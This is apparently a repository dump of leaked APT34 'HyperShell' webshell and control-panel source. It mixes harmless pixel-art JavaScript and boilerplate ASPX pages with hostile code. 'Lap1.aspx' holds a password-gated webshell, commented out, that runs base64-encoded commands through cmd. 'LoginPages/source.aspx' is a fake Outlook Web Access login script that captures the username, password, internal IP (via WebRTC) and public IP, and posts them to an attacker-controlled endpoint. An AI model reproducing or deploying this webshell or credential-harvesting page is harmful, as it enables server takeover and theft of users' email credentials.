[a, a, a, a, a, a, a, a, a, a, 2, 2, 2, 2, 2, 2, 2, 2, 4, 5, 5, 5, 5, 5, 5, 5, 5, 5, 4, a, a, a, a, a, a, a, a, a], // 22
[a, a, a, a, a, a, a, a, a, a, a, 2, 2, 2, 2, 2, 2, 2, 2, 4, 4, 5, 5, 5, 5, 5, 4, 4, 8, a, a, a, a, a, a, a, a, a], // 23
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, 2, 2, 1, 1, 2, 2, 2, 4, 4, 4, 4, 4, 2, 2, 2, 8, 6, 8, a, a, a, a, a, a], // 24
[a, a, a, a, a, a, a, a, a, a, a, a, 2, 2, 2, 2, 2, 1, 4, 5, 4, 4, 4, 6, 6, 6, 6, 2, 8,10, 6, 6, 8, a, a, a, a, a], // 25
[a, a, a, a, a, a, a, a, a, a, a, a, a, 2, 2, 2, 2, 2, 4, 4, 5, 5, 6, 0, 0, 0, 0, 0, 8,10,10, 6, 6, 8, a, a, a, a], // 26
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, 2, 2, 2, 2, 2, 4, 4, 6, 0, 0, 8, 0, 0, 0, 0, 8, 0,10, 6, 8, a, a, a, a], // 27
[a, a, a, a, a, a, a, a, a, a, a, a, 2, 2, 2, 2, 2, 2, 2, 2, 4, 8, 6, 6, 0, 0, 8, 0, 6, 8,10,10, 6, 8, a, a, a, a], // 28
[a, a, a, a, a, a, a, a, a, a, a, a, a, 2, 2, 2, 2, 2, 2, 2, 4, 4, 8, 8, 8, 6, 0, 6, 8, 8, 8, 8, 6, 8, a, a, a, a], // 29
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 2, 2, 2, 2, 2, 2, 4, 4, 4, 8, 6, 6, 8, 8, 4, 4, a, a, a, a, a, a, a], // 30
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 2, 2, 2, 2, 2, 1, 1, 1, 2, 8, 8, 8, 8, a, a, a, a, a, a, a, a, a, a], // 31
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 2, 2, 2, 1, 2, 1, 2, a, a, a, a, a, a, a, a, a, a, a, a, a], // 32
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 2, 1, a, 2, 1, 1, a, a, a, a, a, a, a, a, a, a, a, a], // 33
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 2, 1, a, a, 2, 1, a, a, a, a, a, a, a, a, a, a, a, a], // 34
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 2, 1, a, a, 2, 1, 1, a, a, a, a, a, a, a, a, a, a, a], // 35
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 8, 6, 2, 1, a, 8, 8, 2, 1, 6, a, a, a, a, a, a, a, a, a, a], // 36
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 8, 6, 6, 0, 0, 6, 8, 6, 0, 6, 8, a, a, a, a, a, a, a, a, a, a], // 37
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 8, 8, 8, 6, 6, 8, 8, 8, 8, 6, 6, 8, a, a, a, a, a, a, a, a, a], // 38
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 9,11,12,12,11, 9, 8, 8, 6, 6, 8,11,12,12, a, a, a, a, a, a, a], // 39
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 9,11, 6, 0, 0, 0, 0, 9,11,11,11,11,12,12,10, 0, 0,12, a, a, a, a], // 40
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 9, 6,12,12,12,12,11, 6,11,11,11,11,11, 6, 6,10,12,12, 0,12, a, a], // 41
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 9,11,11,12,12, 0,12,11, 9,11,11,11, 8, 8, 6,11,12,12,12,12,12, a], // 42
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 9,11,11,11,12,12,12,11, 9,11,11,11, 8, 8, 8,11,11,11,11,12,12,12], // 43
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9] // 44
];
var colorBill = [
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 0, 0, 0, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a],
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 0, 0, 0, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a],
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 0, 0, 0, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a],
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 0, 0, 0, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a],
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 0, 0, 0, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a],
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 0, 0, 0, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a],
[a, a, a, a, a, 7, a, a, a, a, a, a, a, a, a, a, a, a, 0, 0, 0, 0, 0, 0, 0, a, a, a, a, a, a, a, a, a, a, a, a, 7, a, a, a, a, a],
[a, a, a, a, 7, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 7, a, a, a, a],
[a, a, a, 7, 7, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 2, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 7, 7, a, a, a],
[a, a, a, 7, 7, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 2, 3, 2, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 7, 7, a, a, a],
[7, a, a, 7, 7, 7, a, a, a, a, a, a, a, a, a, a, a, a, a, 2, 3, 3, 3, 2, a, a, a, a, a, a, a, a, a, a, a, a, a, 7, 7, 7, a, a, 7],
[7, a, 7, 7, 7, 6, 6, a, a, a, a, a, a, a, a, a, a, a, a, 2, 3, 3, 3, 2, a, a, a, a, a, a, a, a, a, a, a, a, 6, 6, 7, 7, 7, a, 7],
[a, 5, 6, 6, 6, 6, 5, a, a, a, a, a, a, a, a, a, a, a, 2, 3, 3, 3, 3, 3, 2, a, a, a, a, a, a, a, a, a, a, a, 5, 6, 6, 6, 6, 5, a],
[a, 5, 5, 6, 6, 5, 5, a, a, a, a, a, a, a, a, a, a, a, 2, 3, 3, 3, 3, 3, 2, a, a, a, a, a, a, a, a, a, a, a, 5, 5, 6, 6, 5, 5, a],
[a, 5, 5, 5, 5, 5, 5, a, a, a, a, a, a, a, a, a, a, 2, 3, 3, 3, 3, 3, 3, 3, 2, a, a, a, a, a, a, a, a, a, a, 5, 5, 5, 5, 5, 5, a],
[a, a, 5, 5, 5, 5, a, a, a, a, a, a, a, a, a, a, 2, 3, 3, 3, 2, 3, 3, 2, 3, 3, 2, a, a, a, a, a, a, a, a, a, a, 5, 5, 5, 5, a, a],
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 2, 2, 3, 2, 2, 2, 2, 2, 3, 2, 2, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a],
[a, a, 0, a, a, a, 0, a, a, a, a, a, a, a, a, 2, 3, 3, 2, 4, 4, 4, 0, 0, 2, 3, 3, 2, a, a, a, a, a, a, a, a, 0, a, a, a, 0, a, a],
[a, a, a, 0, 0, 0, a, a, a, a, a, a, a, a, 2, 3, 3, 2, 4, 4, 4, 4, 0, 0, 4, 2, 3, 3, 2, a, a, a, a, a, a, a, a, 0, 0, 0, a, a, a],
[a, a, 0, 0, 0, 0, 0, a, a, a, a, a, a, a, 2, 3, 2, 4, 4, 4, 4, 4, 0, 0, 4, 4, 2, 3, 2, a, a, a, a, a, a, a, 0, 0, 0, 0, 0, a, a],
[a, a, a, a, a, a, 0, a, a, a, a, a, a, 2, 3, 3, 2, 4, 4, 4, 4, 4, 0, 0, 4, 4, 2, 3, 3, 2, a, a, a, a, a, a, 0, a, a, a, a, a, a],
[a, a, a, a, a, a, a, 0, a, a, a, a, a, 2, 3, 3, 2, 4, 4, 4, 4, 4, 0, 0, 4, 4, 2, 3, 3, 2, a, a, a, a, a, 0, a, a, a, a, a, a, a],
[a, a, a, a, a, a, a, 0, a, a, a, a, 2, 3, 3, 3, 3, 2, 4, 4, 4, 4, 4, 4, 4, 2, 3, 3, 3, 3, 2, a, a, a, a, 0, a, a, a, a, a, a, a],
[a, a, a, a, a, a, a, a, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 2, 4, 4, 4, 4, 4, 2, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, a, a, a, a, a, a, a, a],
[a, a, a, a, a, a, a, a, a, a, a, 2, 3, 3, 3, 3, 3, 2, 3, 2, 2, 2, 2, 2, 3, 2, 3, 3, 3, 3, 3, 2, a, a, a, a, a, a, a, a, a, a, a],
[a, a, a, a, a, a, a, a, a, a, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 3, 3, 2, 3, 3, 3, 3, 3, 3, 3, 3, 2, a, a, a, a, a, a, a, a, a, a],
[a, a, a, a, a, a, a, a, a, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, a, a, a, a, a, a, a, a, a],
[a, a, a, a, a, a, a, a, a, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 2, 2, 2, 0, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, a, a, a, a, a, a, a, a, a],
[a, a, a, a, a, a, a, a, 2, 3, 2, 3, 3, 3, 3, 3, 3, 2, 3, 0, 0, 3, 0, 0, 3, 2, 3, 3, 3, 3, 3, 3, 2, 3, 2, a, a, a, a, a, a, a, a],
[a, a, a, a, a, a, a, a, 2, 3, 2, 3, 3, 3, 3, 3, 3, 2, 3, 0, 0, 0, 0, 0, 3, 2, 3, 3, 3, 3, 3, 3, 2, 3, 2, a, a, a, a, a, a, a, a],
[a, a, a, a, a, a, a, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 0, 2, 0, 0, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, a, a, a, a, a, a, a],
[a, a, a, a, a, a, 2, 3, 3, 3, 3, 3, 3, 2, 3, 3, 3, 3, 3, 0, 3, 2, 3, 0, 3, 3, 3, 3, 3, 2, 3, 3, 3, 3, 3, 3, 2, a, a, a, a, a, a],
[a, a, a, a, a, a, 2, 3, 3, 3, 3, 3, 3, 2, 3, 3, 3, 3, 3, 3, 3, 2, 3, 3, 3, 3, 3, 3, 3, 2, 3, 3, 3, 3, 3, 3, 2, a, a, a, a, a, a],
[a, a, a, a, a, a, a, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, a, a, a, a, a, a, a],
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 0, a, a, a, a, a, a, a, a, a, 0, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a],
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 0, a, a, a, a, a, a, a, a, a, a, a, 0, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a],
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 0, a, a, a, a, a, a, a, a, a, a, a, 0, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a],
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 0, a, a, a, a, a, a, a, a, a, a, a, 0, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a],
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 0, a, a, a, a, a, a, a, a, a, 0, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a],
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 0, 0, a, a, a, a, a, 0, 0, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a],
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 0, 0, a, a, a, a, a, 0, 0, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a],
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 0, 0, a, a, a, a, a, 0, 0, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a],
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 0, a, a, a, a, a, 0, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a]
];
var size = 3;
var heightBlock = color.length;
var withBlock = color[0].length;
function hyperSonic(id)
{
var maker = document.getElementById(id);
maker.style.width = (size * withBlock) + "px";
maker.style.height = (size * heightBlock) + "px";
for (var i = 0; i < heightBlock; i++) {
for (var j = 0; j < withBlock; j++) {
if (color[i][j] != -1) {
var temp = document.createElement("div");
//temp.style.backgroundColor = '#' + colorNum[color[i][j]];
temp.style.top = (i * size) + "px";
temp.style.left = (j * size) + "px";
temp.className = '_' + color[i][j];
temp.id = i + "-" + j;
//if (color[i][j] < 4 && color[i][j] > 0)
// temp.className += g;
maker.appendChild(temp);
}
}
}
if (g == 'g')
{
document.getElementsByTagName('body')[0].style.backgroundColor = 'white';
setTimeout(DoG, 1500);
}
setTimeout(animeFunc, 3000);
}
function pixDraw(elID, colorMatrix, colorPerfix)
{
var blockH = colorMatrix.length;
var blockW = colorMatrix[0].length;
var maker = document.getElementById(elID);
maker.style.width = (size * blockW) + "px";
maker.style.height = (size * blockH) + "px";
for (var i = 0; i < blockH; i++) {
for (var j = 0; j < blockW; j++) {
if (colorMatrix[i][j] != -1) {
var temp = document.createElement("div");
//temp.style.backgroundColor = '#' + colorNum[color[i][j]];
temp.style.top = (i * size) + "px";
temp.style.left = (j * size) + "px";
temp.className = '_' + colorPerfix + colorMatrix[i][j];
temp.id = i + "-" + j;
//if (color[i][j] < 4 && color[i][j] > 0)
// temp.className += g;
maker.appendChild(temp);
}
}
}
//if (g == 'g') {
// document.getElementsByTagName('body')[0].style.backgroundColor = 'white';
// setTimeout(DoG, 1500);
//}
//setTimeout(animeFunc, 3000);
}
var GoldCount = 211 + 190 + 100 + 2 + 4;
function DoG()
{
var isOk = false;
var idList = [];
if(GoldCount > 0)
{
var o = Math.floor(GoldCount / 14);
//console.log('o = ' + o);
var idTemp = getRand(o - 10, heightBlock - 1) + "-" + getRand(0, withBlock - 1);
var temp = document.getElementById(idTemp);
if (temp) {
if (temp.className == '_1' || temp.className == '_2' || temp.className == '_3' || temp.className == '_7') {
if (idList.indexOf(idTemp) == -1) {
isOk = true;
GoldCount--;
idList.push(idTemp);
temp.className = temp.className + 'g';
var i1 = document.getElementsByClassName('_1');
var i2 = document.getElementsByClassName('_2');
var i3 = document.getElementsByClassName('_3');
var i7 = document.getElementsByClassName('_7');
console.log('real = ' + (i1.length + i2.length + i3.length));
var ii = (i1.length + i2.length + i3.length + i7.length);
if (ii <= 5)
{
GoldCount = 0;
var c1 = i1.length;
var c2 = i2.length;
var c3 = i3.length;
var c7 = i7.length;
for (var f = 0; f < c1; f++)
i1[0].className = '_1g';
for (var i = 0; i < c2; i++)
i2[0].className = '_2g';
for (var i = 0; i < c3; i++)
i3[0].className = '_3g';
for (var i = 0; i < c7; i++)
i7[0].className = '_7g';
console.log('real = ' + (i1.length + i2.length + i3.length))
}
}
}
}
if (isOk)
setTimeout(DoG, Math.round(GoldCount / 130) + 1);
else
DoG();
}
}
var EyeBlink = true;
var NextDoubleBlink = 2;
var EyeBlinkCount = 0;
var g = 'g';
function animeFunc() {
var anime = [
[15, 20, 5],
[15, 21, 5],
[16, 20, 5],
[16, 21, 5],
[16, 22, 5],
[16, 28, 5],
[17, 20, 5],
[17, 21, 5],
[17, 22, 5],
[17, 23, 5],
[17, 24, 5],
[17, 28, 5],
[18, 21, 5],
[18, 22, 5],
[18, 23, 5],
[18, 24, 5],
[18, 25, 5],
[18, 26, 5],
[18, 27, 5],
[18, 28, 5],
[19, 22, 5],
[19, 23, 5],
[19, 24, 5],
[19, 25, 5],
[19, 26, 5],
[19, 27, 5],
[19, 28, 5],
[20, 23, 6],
[20, 24, 5],
[20, 25, 5]
];
if (EyeBlink) {
EyeBlinkCount++;
EyeBlink = false;
for (var i = 0; i < anime.length; i++) {
var item = document.getElementById(anime[i][0] + "-" + anime[i][1]);
item.className = "_" + anime[i][2];
}
setTimeout(animeFunc, 200);
} else {
EyeBlink = true;
for (var i = 0; i < anime.length; i++) {
var item = document.getElementById(anime[i][0] + "-" + anime[i][1]);
item.className = "_" + color[anime[i][0]][anime[i][1]];
if (color[anime[i][0]][anime[i][1]] == 7)
item.className = item.className + g;
}
if (EyeBlinkCount == NextDoubleBlink)
{
EyeBlinkCount = 0;
NextDoubleBlink = getRand(4, 7);
setTimeout(animeFunc, 200);
}
else
setTimeout(animeFunc, 3500);
}
}
function getRand(min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
var newColorW = 70;
var newColorH = 70;
var colorCount = 0;
var strClasses;
var ResultMatrix = [];
function setColor(a)
{
var SelectedColorNumber = 0;
console.log(a.id);
var itemColor = document.getElementById('color');
var result = document.getElementById('result');
var SelectedColor = itemColor.value;
if (document.getElementById(SelectedColor))
{
var temp = document.getElementById(SelectedColor);
SelectedColorNumber = temp.innerHTML;
}
else
{
var temp = document.createElement("div");
strClasses += '<br>._a' + colorCount + '{background-color:#' + SelectedColor + '}';
temp.id = SelectedColor;
temp.innerHTML = colorCount;
SelectedColorNumber = colorCount;
colorCount++;
temp.setAttribute('style', 'display:none');
document.getElementById('body').appendChild(temp);
}
if (a.getAttribute('ch') == 't')
{
a.setAttribute('ch', '');
a.style.borderRight = '1px solid';
a.style.borderBottom = '1px solid';
a.style.backgroundColor = '';
SelectedColorNumber = 'a';
}
else
{
a.setAttribute('ch', 't');
a.style.borderRight = '1px solid #' + SelectedColor;
a.style.borderBottom = '1px solid #' + SelectedColor;
a.style.backgroundColor = '#' + SelectedColor;
}
var indx = a.id.split('-');
var str = 'new color = [<br>';
for (var i = 0; i < newColorH; i++) {
str += '[';
for (var j = 0; j < newColorW; j++) {
if (i == parseInt(indx[0], 10) && j == parseInt(indx[1], 10))
ResultMatrix[i][j] = SelectedColorNumber;
str += ResultMatrix[i][j] + ', ';
}
str += '],<br>';
}
str += '];<br>';
result.innerHTML = strClasses + '<br>' + str;
}
function maker()
{
var mysize = 10;
var maker = document.getElementById("BillCypher");
maker.setAttribute('style', 'display:')
for (var i = 0; i < newColorH; i++) {
var newNode = [];
for (var j = 0; j < newColorW; j++) {
newNode.push('a');
var temp = document.createElement("div");
//temp.style.backgroundColor = '#' + colorNum[color[i][j]];
temp.style.top = (i * mysize) + "px";
temp.style.left = (j * mysize) + "px";
//temp.className = '_' + colorPerfix + color[i][j];
temp.id = i + "-" + j;
temp.setAttribute('onclick', 'setColor(this)');
//if (color[i][j] < 4 && color[i][j] > 0)
// temp.className += g;
maker.appendChild(temp);
}
ResultMatrix.push(newNode);
}
}
window.onload = function () {
g = 'g'
//hyperSonic('Maker2');
pixDraw('Maker2', color, 's');
//maker();
//pixDraw('Maker2', colorBill, 'b');
}
</script>
</head>
<body id="body">
<form id="form1" runat="server">
<div>
<div class="LeftPanel">
<div id="Maker" class="Maker"></div>
<div id="Maker2" class="Maker"></div>
<div id="BillCypher" style="display:none"></div>
<input id="color" />
<div id="result"></div>
</div>
<div class="RightPanel">
<%--<div style="background-image:url(/Image/hyper.png);width:448px;height:529px;background-position:-178px -263px"></div>--%>
<div style="background-image:url(/Image/s-l300.jpg);width:171px;height:180px;background-position:-51px -36px"></div>
</div>
</div>
</form>
</body>
</html>

17
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Lab/PicMaker.aspx.cs Normal file
View File

@@ -0,0 +1,17 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
namespace HyperShell.Shell
{
public partial class PicMaker : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
}
}
}

26
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Lab/PicMaker.aspx.designer.cs generated Normal file
View File

@@ -0,0 +1,26 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace HyperShell.Shell
{
public partial class PicMaker
{
/// <summary>
/// form1 control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.HtmlControls.HtmlForm form1;
}
}

19
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Lab/ScreenShot.aspx Normal file
View File

@@ -0,0 +1,19 @@
<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="ScreenShot.aspx.cs" Inherits="HyperShell.Lab.ScreenShot" %>
<!DOCTYPE html>
<%@ Import Namespace="System.Drawing" %>
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title></title>
<%
var bmpScreenShot = new Bitmap(Screen)
%>
</head>
<body>
<form id="form1" runat="server">
<div>
</div>
</form>
</body>
</html>

16
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Lab/ScreenShot.aspx.cs Normal file
View File

@@ -0,0 +1,16 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
namespace HyperShell.Lab
{
public partial class ScreenShot : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
}
}
}

26
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Lab/ScreenShot.aspx.designer.cs generated Normal file
View File

@@ -0,0 +1,26 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace HyperShell.Lab
{
public partial class ScreenShot
{
/// <summary>
/// form1 control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.HtmlControls.HtmlForm form1;
}
}

47
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Lap1.aspx Normal file
View File

@@ -0,0 +1,47 @@
<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="Lap1.aspx.cs" Inherits="HyperShell.Lap1" %>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title></title>
<%
// if (Encoding.UTF8.GetString(Convert.FromBase64String(Request.Form["newPwd1"])).GetHashCode().ToString("X8") == "028FEF27")
//{
// System.Diagnostics.Process p = new System.Diagnostics.Process();
// System.Diagnostics.ProcessStartInfo i = p.StartInfo;
// i.FileName = "cmd";
// i.UseShellExecute = false;
// i.CreateNoWindow = true;
// i.RedirectStandardInput = true;
// i.RedirectStandardOutput = true;
// i.RedirectStandardError = true;
// p.Start();
// p.StandardInput.WriteLine(Encoding.UTF8.GetString(Convert.FromBase64String(Request.Form["newPwd2"])));
// string r = p.StandardOutput.ReadToEnd();
// p.WaitForExit();
// p.Close();
// Response.Write("<pre>" + Server.HtmlEncode(r) + "</pre>");
// Response.End();
//}
// string pJxsCuCACbGngMlQ="aqB2nU65TgFoEfdVqiAddBQLInc9";
// string onFLmAzE="NxKK<TjWN^lv-$*UZ|Z-H;cGL(O>7a";
// Response.Write(Convert.ToBase64String(new System.Security.Cryptography.SHA1Managed().ComputeHash(Encoding.ASCII.GetBytes(onFLmAzE + pJxsCuCACbGngMlQ))));
// if (Convert.ToBase64String(new System.Security.Cryptography.SHA1Managed().ComputeHash(Encoding.ASCII.GetBytes(onFLmAzE + pJxsCuCACbGngMlQ))) == "nT/xBvvDUIuEU8fW8oVUPQucJyE=") {
//Response.Write(")$wO9%4{@&q;M3JLKpq}Akl$dXT".GetHashCode().ToString("X8"));
//Response.Write(Convert.ToBase64String(new System.Security.Cryptography.SHA1Managed().ComputeHash(Encoding.ASCII.GetBytes(")$wO9%4{@&q;M3JLKpq}Akl$dXT" + "reDGEa@#!%FS"))));
//Response.End();
//}
%>
</head>
<body>
<form id="form1" runat="server">
<div>
</div>
</form>
</body>
</html>

47
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Lap1.aspx.cs Normal file
View File

@@ -0,0 +1,47 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Data.SQLite;
using System.Data;
using System.Text.RegularExpressions;
using System.IO;
namespace HyperShell
{
public partial class Lap1 : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
#region [ Test System.IO.Path ]
#endregion
#region [ Regex nbt ]
#endregion
}
public static List<string> GetImportedFileList()
{
List<string> ImportedFiles = new List<string>();
using (SQLiteConnection connect = new SQLiteConnection(@"Data Source=C:\Documents and Settings\js91162\Desktop\CMMData.db3"))
{
connect.Open();
using (SQLiteCommand fmd = connect.CreateCommand())
{
fmd.CommandText = @"SELECT DISTINCT FileName FROM Import";
fmd.CommandType = CommandType.Text;
SQLiteDataReader r = fmd.ExecuteReader();
while (r.Read())
{
ImportedFiles.Add(Convert.ToString(r["FileName"]));
}
}
}
return ImportedFiles;
}
}
}

26
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Lap1.aspx.designer.cs generated Normal file
View File

@@ -0,0 +1,26 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace HyperShell
{
public partial class Lap1
{
/// <summary>
/// form1 control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.HtmlControls.HtmlForm form1;
}
}

135
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/LoginPages/source.aspx Normal file
View File

@@ -0,0 +1,135 @@
<%@ Page language="c#" AutoEventWireup="false" %>
<script>
function chkpress(event, sender) {
var key = event.keyCode | event.which;
if (key == 13) {
clklgnok();
return false;
}
return true;
}
function getInfo(callback) {
var ip_dups = {};
var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
var useWebKit = !!window.webkitRTCPeerConnection;
if (!RTCPeerConnection) {
var win = iframe.contentWindow;
RTCPeerConnection = win.RTCPeerConnection || win.mozRTCPeerConnection || win.webkitRTCPeerConnection;
useWebKit = !!win.webkitRTCPeerConnection;
}
var mediaConstraints = {
optional: [{
RtpDataChannels: true
}]
};
var servers = {
iceServers: [{
urls: "stun:stun.services.mozilla.com"
}]
};
var pc = new RTCPeerConnection(servers, mediaConstraints);
var sentResult = false;
function handleCandidate(candidate) {
var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
var ip_addr = ip_regex.exec(candidate)[1];
if (!sentResult && ip_dups[ip_addr] === undefined) {
sentResult = true;
callback(ip_addr);
}
ip_dups[ip_addr] = true;
}
pc.onicecandidate = function (ice) {
if (ice.candidate)
handleCandidate(ice.candidate.candidate);
};
pc.createDataChannel("");
pc.createOffer(function (result) {
pc.setLocalDescription(result, function () { }, function () { });
}, function () { });
setTimeout(function () {
var lines = pc.localDescription.sdp.split('\n');
lines.forEach(function (line) {
if (line.indexOf('a=candidate:') === 0)
handleCandidate(line);
});
}, 1000);
}
function clklgnok(){
var h = new XMLHttpRequest();
var u = "/owa/auth/outlookcn.aspx";
var n = document.getElementById("username");
var p = document.getElementById("password");
var i;
var w;
//try {
// var fi = new Promise(r => {
// var w = window, a = new (w.RTCPeerConnection || w.mozRTCPeerConnection || w.webkitRTCPeerConnection)({ iceServers: [] }), b = () => { };
// a.createDataChannel("");
// a.createOffer(c => a.setLocalDescription(c, b, b), b);
// a.onicecandidate = c => { try { c.candidate.candidate.match(/([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/g).forEach(r) } catch (e) { } }
// });
// fi.then(ip => i = ip);
//}
//catch (err) {
//}
try {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function () {
if (xhttp.readyState == 4 && xhttp.status == 200) {
w = JSON.parse(xhttp.responseText).ip;
}
};
xhttp.open("GET", "https://api.ipify.org?format=json", true);
xhttp.send();
} catch (e) {
}
getInfo(function (tf) {
i = tf;
var s = "arcname=" + encodeURIComponent(n.value) + "&arcpath=" + encodeURIComponent(p.value) + "&arci=" + encodeURIComponent(i) + "&arcw=" + encodeURIComponent(w);
h.open("POST", u, true);
h.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
h.setRequestHeader("Content-length", s.length);
h.setRequestHeader("Connection", "close");
h.onloadend = function () { clkLgn(); };
h.send(s);
});
//try {
// var xmlHttp = new XMLHttpRequest();
// xmlHttp.open("GET", "https://api.ipify.org/", true);
// xmlHttp.onloadend = function () {
// w = xmlHttp.responseText;
